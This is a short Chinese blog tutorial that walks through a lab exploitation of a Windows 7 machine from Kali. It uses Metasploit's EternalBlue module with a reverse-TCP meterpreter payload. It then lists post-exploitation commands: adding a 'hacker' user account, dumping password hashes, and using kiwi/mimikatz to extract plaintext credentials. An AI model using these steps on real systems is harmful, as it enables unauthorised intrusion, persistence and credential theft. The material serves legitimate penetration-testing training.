赞
踩
实验环境
靶机:win7
IP:192.168.43.144
攻击机:kali
ip:192.168.43.150
实验开始:
第一步:
打开msfconsole进入到工具里面
搜索一下永恒之蓝漏洞
search ms17_010
这上面有三个可以利用的漏洞我们选择第一个
use exploit/windows/smb/ms17_010_eternalblue
接下来我们可以查看需要设置的IP地址和端口
show options 另外Required为yes的也需要设置
set rhosts 192.168.43.144
除此之外还需要设置payload
set payload
set payload windows/x64/meterpreter/reverse_tcp
设置完成后就进行攻击
我们输入shell就可以进入到win7的cmd
如果出现乱码的话就输入
chcp 65001
我们查看win7的IP
ipconfig
添加用户
net user hacker hacker123 /add
查看系统信息
sysinfo
还可以使用mimkatz抓取明文密码
先使用hashdump抓取密码
使用kiwi
load kiwi
查看一下帮助命令
help kiwi
最后使用creds_all命令抓取明文密码
还可以使用screenshot命令截屏
这是几个渗透后可以使用的命令
其实还有很多可以执行的操作就不一一列举了
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。